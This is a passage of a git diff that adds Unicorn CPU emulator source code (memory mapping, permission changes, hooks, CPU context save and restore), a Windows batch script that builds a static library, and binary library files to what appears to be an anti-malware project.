are too far gone + // at that point to recover. Could try to remap orignal region, but these smaller + // allocation just failed so no guarantee that we can recover the original + // allocation at this point + if (l_size > 0) { + if (!prealloc) { + if (uc_mem_map(uc, begin, l_size, perms) != UC_ERR_OK) + goto error; + if (uc_mem_write(uc, begin, backup, l_size) != UC_ERR_OK) + goto error; + } else { + if (uc_mem_map_ptr(uc, begin, l_size, perms, backup) != UC_ERR_OK) + goto error; + } + } + + if (m_size > 0 && !do_delete) { + if (!prealloc) { + if (uc_mem_map(uc, address, m_size, perms) != UC_ERR_OK) + goto error; + if (uc_mem_write(uc, address, backup + l_size, m_size) != UC_ERR_OK) + goto error; + } else { + if (uc_mem_map_ptr(uc, address, m_size, perms, backup + l_size) != UC_ERR_OK) + goto error; + } + } + + if (r_size > 0) { + if (!prealloc) { + if (uc_mem_map(uc, chunk_end, r_size, perms) != UC_ERR_OK) + goto error; + if (uc_mem_write(uc, chunk_end, backup + l_size + m_size, r_size) != UC_ERR_OK) + goto error; + } else { + if (uc_mem_map_ptr(uc, chunk_end, r_size, perms, backup + l_size + m_size) != UC_ERR_OK) + goto error; + } + } + + if (!prealloc) + free(backup); + return true; + +error: + if (!prealloc) + free(backup); + return false; +} + +UNICORN_EXPORT +uc_err uc_mem_protect(struct uc_struct *uc, uint64_t address, size_t size, uint32_t perms) +{ + MemoryRegion *mr; + uint64_t addr = address; + size_t count, len; + bool remove_exec = false; + + if (size == 0) + // trivial case, no change + return UC_ERR_OK; + + // address must be aligned to uc->target_page_size + if ((address & uc->target_page_align) != 0) + return UC_ERR_ARG; + + // size must be multiple of uc->target_page_size + if ((size & uc->target_page_align) != 0) + return UC_ERR_ARG; + + // check for only valid permissions + if ((perms & ~UC_PROT_ALL) != 0) + return UC_ERR_ARG; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + // check that user's entire requested block 
is mapped + if (!check_mem_area(uc, address, size)) + return UC_ERR_NOMEM; + + // Now we know entire region is mapped, so change permissions + // We may need to split regions if this area spans adjacent regions + addr = address; + count = 0; + while(count < size) { + mr = memory_mapping(uc, addr); + len = (size_t)MIN(size - count, mr->end - addr); + if (!split_region(uc, mr, addr, len, false)) + return UC_ERR_NOMEM; + + mr = memory_mapping(uc, addr); + // will this remove EXEC permission? + if (((mr->perms & UC_PROT_EXEC) != 0) && ((perms & UC_PROT_EXEC) == 0)) + remove_exec = true; + mr->perms = perms; + uc->readonly_mem(mr, (perms & UC_PROT_WRITE) == 0); + + count += len; + addr += len; + } + + // if EXEC permission is removed, then quit TB and continue at the same place + if (remove_exec) { + uc->quit_request = true; + uc_emu_stop(uc); + } + + return UC_ERR_OK; +} + +UNICORN_EXPORT +uc_err uc_mem_unmap(struct uc_struct *uc, uint64_t address, size_t size) +{ + MemoryRegion *mr; + uint64_t addr; + size_t count, len; + + if (size == 0) + // nothing to unmap + return UC_ERR_OK; + + // address must be aligned to uc->target_page_size + if ((address & uc->target_page_align) != 0) + return UC_ERR_ARG; + + // size must be multiple of uc->target_page_size + if ((size & uc->target_page_align) != 0) + return UC_ERR_ARG; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + // check that user's entire requested block is mapped + if (!check_mem_area(uc, address, size)) + return UC_ERR_NOMEM; + + // Now we know entire region is mapped, so do the unmap + // We may need to split regions if this area spans adjacent regions + addr = address; + count = 0; + while(count < size) { + mr = memory_mapping(uc, addr); + len = (size_t)MIN(size - count, mr->end - addr); + if (!split_region(uc, mr, addr, len, true)) + return UC_ERR_NOMEM; + + // if we can retrieve the mapping, then no splitting took place + // so unmap here + mr = memory_mapping(uc, addr); + if (mr != 
NULL) + uc->memory_unmap(uc, mr); + count += len; + addr += len; + } + + return UC_ERR_OK; +} + +// find the memory region of this address +MemoryRegion *memory_mapping(struct uc_struct* uc, uint64_t address) +{ + unsigned int i; + + if (uc->mapped_block_count == 0) + return NULL; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + // try with the cache index first + i = uc->mapped_block_cache_index; + + if (i < uc->mapped_block_count && address >= uc->mapped_blocks[i]->addr && address < uc->mapped_blocks[i]->end) + return uc->mapped_blocks[i]; + + for(i = 0; i < uc->mapped_block_count; i++) { + if (address >= uc->mapped_blocks[i]->addr && address <= uc->mapped_blocks[i]->end - 1) { + // cache this index for the next query + uc->mapped_block_cache_index = i; + return uc->mapped_blocks[i]; + } + } + + // not found + return NULL; +} + +UNICORN_EXPORT +uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, + void *user_data, uint64_t begin, uint64_t end, ...) +{ + int ret = UC_ERR_OK; + int i = 0; + + struct hook *hook = calloc(1, sizeof(struct hook)); + if (hook == NULL) { + return UC_ERR_NOMEM; + } + + hook->begin = begin; + hook->end = end; + hook->type = type; + hook->callback = callback; + hook->user_data = user_data; + hook->refs = 0; + hook->to_delete = false; + *hh = (uc_hook)hook; + + // UC_HOOK_INSN has an extra argument for instruction ID + if (type & UC_HOOK_INSN) { + va_list valist; + + va_start(valist, end); + hook->insn = va_arg(valist, int); + va_end(valist); + + if (uc->insn_hook_validate) { + if (! 
uc->insn_hook_validate(hook->insn)) { + free(hook); + return UC_ERR_HOOK; + } + } + + if (uc->hook_insert) { + if (list_insert(&uc->hook[UC_HOOK_INSN_IDX], hook) == NULL) { + free(hook); + return UC_ERR_NOMEM; + } + } else { + if (list_append(&uc->hook[UC_HOOK_INSN_IDX], hook) == NULL) { + free(hook); + return UC_ERR_NOMEM; + } + } + + hook->refs++; + return UC_ERR_OK; + } + + while ((type >> i) > 0) { + if ((type >> i) & 1) { + // TODO: invalid hook error? + if (i < UC_HOOK_MAX) { + if (uc->hook_insert) { + if (list_insert(&uc->hook[i], hook) == NULL) { + if (hook->refs == 0) { + free(hook); + } + return UC_ERR_NOMEM; + } + } else { + if (list_append(&uc->hook[i], hook) == NULL) { + if (hook->refs == 0) { + free(hook); + } + return UC_ERR_NOMEM; + } + } + hook->refs++; + } + } + i++; + } + + // we didn't use the hook + // TODO: return an error? + if (hook->refs == 0) { + free(hook); + } + + return ret; +} + + +UNICORN_EXPORT +uc_err uc_hook_del(uc_engine *uc, uc_hook hh) +{ + int i; + struct hook *hook = (struct hook *)hh; + + // we can't dereference hook->type if hook is invalid + // so for now we need to iterate over all possible types to remove the hook + // which is less efficient + // an optimization would be to align the hook pointer + // and store the type mask in the hook pointer. 
+ for (i = 0; i < UC_HOOK_MAX; i++) { + if (list_exists(&uc->hook[i], (void *) hook)) { + hook->to_delete = true; + list_append(&uc->hooks_to_del, hook); + } + } + + return UC_ERR_OK; +} + +// TCG helper +void helper_uc_tracecode(int32_t size, uc_hook_type type, void *handle, int64_t address); +void helper_uc_tracecode(int32_t size, uc_hook_type type, void *handle, int64_t address) +{ + struct uc_struct *uc = handle; + struct list_item *cur; + struct hook *hook; + + // sync PC in CPUArchState with address + if (uc->set_pc) { + uc->set_pc(uc, address); + } + + for (cur = uc->hook[type].head; cur != NULL && (hook = (struct hook *)cur->data); cur = cur->next) { + if (hook->to_delete) + continue; + if (HOOK_BOUND_CHECK(hook, (uint64_t)address)) { + ((uc_cb_hookcode_t)hook->callback)(uc, address, size, hook->user_data); + } + } +} + +UNICORN_EXPORT +uint32_t uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count) +{ + uint32_t i; + uc_mem_region *r = NULL; + + *count = uc->mapped_block_count; + + if (*count) { + r = g_malloc0(*count * sizeof(uc_mem_region)); + if (r == NULL) { + // out of memory + return UC_ERR_NOMEM; + } + } + + for (i = 0; i < *count; i++) { + r[i].begin = uc->mapped_blocks[i]->addr; + r[i].end = uc->mapped_blocks[i]->end - 1; + r[i].perms = uc->mapped_blocks[i]->perms; + } + + *regions = r; + + return UC_ERR_OK; +} + +UNICORN_EXPORT +uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result) +{ + switch(type) { + default: + return UC_ERR_ARG; + + case UC_QUERY_PAGE_SIZE: + *result = uc->target_page_size; + break; + + case UC_QUERY_ARCH: + *result = uc->arch; + break; + + case UC_QUERY_MODE: +#ifdef UNICORN_HAS_ARM + if (uc->arch == UC_ARCH_ARM) { + return uc->query(uc, type, result); + } +#endif + return UC_ERR_ARG; + + case UC_QUERY_TIMEOUT: + *result = uc->timed_out; + break; + } + + return UC_ERR_OK; +} + +static size_t cpu_context_size(uc_arch arch, uc_mode mode) +{ + // each of these constants is defined by 
offsetof(CPUXYZState, tlb_table) + // tbl_table is the first entry in the CPU_COMMON macro, so it marks the end + // of the interesting CPU registers + switch (arch) { +#ifdef UNICORN_HAS_M68K + case UC_ARCH_M68K: return M68K_REGS_STORAGE_SIZE; +#endif +#ifdef UNICORN_HAS_X86 + case UC_ARCH_X86: return X86_REGS_STORAGE_SIZE; +#endif +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: return mode & UC_MODE_BIG_ENDIAN ? +#ifdef UNICORN_HAS_ARMEB + ARM_REGS_STORAGE_SIZE_armeb +#else + 0 +#endif + : ARM_REGS_STORAGE_SIZE_arm; +#endif +#ifdef UNICORN_HAS_ARM64 + case UC_ARCH_ARM64: return mode & UC_MODE_BIG_ENDIAN ? ARM64_REGS_STORAGE_SIZE_aarch64eb : ARM64_REGS_STORAGE_SIZE_aarch64; +#endif +#ifdef UNICORN_HAS_MIPS + case UC_ARCH_MIPS: + if (mode & UC_MODE_MIPS64) { + if (mode & UC_MODE_BIG_ENDIAN) { + return MIPS64_REGS_STORAGE_SIZE_mips64; + } else { + return MIPS64_REGS_STORAGE_SIZE_mips64el; + } + } else { + if (mode & UC_MODE_BIG_ENDIAN) { + return MIPS_REGS_STORAGE_SIZE_mips; + } else { + return MIPS_REGS_STORAGE_SIZE_mipsel; + } + } +#endif +#ifdef UNICORN_HAS_SPARC + case UC_ARCH_SPARC: return mode & UC_MODE_SPARC64 ? 
SPARC64_REGS_STORAGE_SIZE : SPARC_REGS_STORAGE_SIZE; +#endif + default: return 0; + } +} + +UNICORN_EXPORT +uc_err uc_context_alloc(uc_engine *uc, uc_context **context) +{ + struct uc_context **_context = context; + size_t size = uc_context_size(uc); + + *_context = malloc(size); + if (*_context) { + (*_context)->jmp_env_size = sizeof(*uc->cpu->jmp_env); + (*_context)->context_size = cpu_context_size(uc->arch, uc->mode); + (*_context)->uc = uc; + if (list_insert(&uc->saved_contexts, *_context)) { + return UC_ERR_OK; + } else { + return UC_ERR_NOMEM; + } + } else { + return UC_ERR_NOMEM; + } +} + +UNICORN_EXPORT +uc_err uc_free(void *mem) +{ + g_free(mem); + return UC_ERR_OK; +} + +UNICORN_EXPORT +size_t uc_context_size(uc_engine *uc) +{ + // return the total size of struct uc_context + return sizeof(uc_context) + cpu_context_size(uc->arch, uc->mode) + sizeof(*uc->cpu->jmp_env); +} + +UNICORN_EXPORT +uc_err uc_context_save(uc_engine *uc, uc_context *context) +{ + memcpy(context->data, uc->cpu->env_ptr, context->context_size); + memcpy(context->data + context->context_size, uc->cpu->jmp_env, context->jmp_env_size); + + return UC_ERR_OK; +} + +UNICORN_EXPORT +uc_err uc_context_restore(uc_engine *uc, uc_context *context) +{ + memcpy(uc->cpu->env_ptr, context->data, context->context_size); + if (list_exists(&uc->saved_contexts, context)) { + memcpy(uc->cpu->jmp_env, context->data + context->context_size, context->jmp_env_size); + } + + return UC_ERR_OK; +} + +UNICORN_EXPORT +uc_err uc_context_free(uc_context *context) +{ + uc_engine* uc = context->uc; + // if uc is NULL, it means that uc_engine has been free-ed. 
+ if (uc) { + list_remove(&uc->saved_contexts, context); + } + return uc_free(context); +} \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/windows_export.bat b/ai_anti_malware/unicorn/unicorn-master/windows_export.bat new file mode 100644 index 0000000..430efcc --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/windows_export.bat @@ -0,0 +1,43 @@ +@echo off +setlocal ENABLEDELAYEDEXPANSION + +if not "%1"=="x86" if not "%1"=="x64" ( + echo Usage: windows_export.bat (x86 ^| x64^) + exit /b 1 +) + +:: This script invokes the Visual Studio linker to construct a static library file that can be used outside of Mingw. +:: The unicorn.def file that it references below is produced by the Mingw compiler via a linker flag. +:: The arch (x86 or x64) we are working on should be passed via the first argument to this script. + +:: Look up the Visual Studio install path via the registry +:: http://stackoverflow.com/questions/445167/how-can-i-get-the-value-of-a-registry-key-from-within-a-batch-script +:: There's no way to get the current installed VS version other than enumerating a version whitelist +:: If anyone ever tells you that Windows is a reasonable operating system, they are wrong + +echo Searching for installed visual studio version... +for %%V in ( +HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\VisualStudio\12.0 +HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\VisualStudio\14.0 +HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\VisualStudio\15.0 +HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VisualStudio\12.0 +HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VisualStudio\14.0 +HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VisualStudio\15.0 +) do ( + echo ...trying registry key %%V + for /F "usebackq tokens=3*" %%A IN (`REG QUERY %%V /v InstallDir 2^>NUL`) DO ( + set appdir=%%A %%B + ) + if not "!appdir!"=="" goto :break +) +:break + +if "%appdir%"=="" ( + echo Could not find an installed visual studio version. 
Abandoning windows static lib export operation. +) else ( + :: Add the Visual Studio binaries to our path and run the linker + call "%appdir%..\..\VC\vcvarsall.bat" %1 + call lib /machine:%1 /def:unicorn.def +) + +exit /b 0 diff --git a/ai_anti_malware/unicorn/unicorn.dll b/ai_anti_malware/unicorn/unicorn.dll new file mode 100644 index 0000000..00a0001 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn.dll differ diff --git a/ai_anti_malware/unicorn/unicorn.lib b/ai_anti_malware/unicorn/unicorn.lib new file mode 100644 index 0000000..08338d6 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn.lib differ